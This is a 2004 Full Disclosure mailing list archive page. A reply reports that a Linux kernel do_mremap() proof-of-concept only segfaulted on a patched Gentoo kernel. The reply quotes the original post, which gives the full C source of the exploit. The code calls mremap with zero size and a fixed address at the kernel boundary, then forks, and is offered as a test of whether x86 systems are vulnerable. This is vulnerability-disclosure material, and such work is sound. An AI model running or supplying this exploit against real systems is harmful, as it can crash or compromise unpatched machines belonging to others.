Full Disclosure mailing list archives
RE: Linux kernel do_mremap() proof-of-concept exploit code
From: Bryce Porter <bporter () heart net>
Date: Wed, 7 Jan 2004 09:40:00 -0600
I tested this on a Gentoo-patched 2.4.23 kernel and it did nothing except segfault. Not sure exactly which patches Gentoo uses, but it could be a grsecurity limitation or some such. I compiled the code by doing this: gcc -o mremap_poc mremap_poc.c And I ran it as a normal user. Hope this helps... Regards, Bryce Porter (x86) Network Administrator Heart Technologies, Inc. Direct 309-634-2282 Toll-Free 877-733-4638 Fax 309-697-3191 -----Original Message----- From: Christophe Devine [mailto:devine () iie cnam fr] Sent: Monday, January 05, 2004 3:23 PM To: full-disclosure () lists netsys com; bugtraq () securityfocus com Subject: Linux kernel do_mremap() proof-of-concept exploit code The following program can be used to test if a x86 Linux system is vulnerable to the do_mremap() exploit; use at your own risk. $ cat mremap_poc.c /* * Proof-of-concept exploit code for do_mremap() * * Copyright (C) 2004 Christophe Devine and Julien Tinnes * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA */ #include <asm/unistd.h> #include <sys/mman.h> #include <unistd.h> #include <errno.h> #define MREMAP_MAYMOVE 1 #define MREMAP_FIXED 2 #define __NR_real_mremap __NR_mremap static inline _syscall5( void *, real_mremap, void *, old_address, size_t, old_size, size_t, new_size, unsigned long, flags, void *, new_address ); int main( void ) { void *base; base = mmap( NULL, 8192, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 ); real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED, (void *) 0xC0000000 ); fork(); return( 0 ); } -- Christophe Devine - http://www.cr0.net:8040/about/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Re: Re: Linux kernel do_mremap() proof-of-concept exploit code, (continued)
- Re: Re: Linux kernel do_mremap() proof-of-concept exploit code backblue (Jan 06)
- Re: Re: Linux kernel do_mremap() proof-of-concept exploit code Pierre BETOUIN (Jan 06)
- Re: Re: Linux kernel do_mremap() proof-of-concept exploit code Daniel B (Jan 06)
- Re: Re: Linux kernel do_mremap() proof-of-concept exploit code Luke Norman (Jan 06)
- Re: Re: Linux kernel do_mremap() proof-of-concept exploit code José María Mateos (Jan 06)
- Re: Re: Linux kernel do_mremap() proof-of-concept exploit code KF (Jan 06)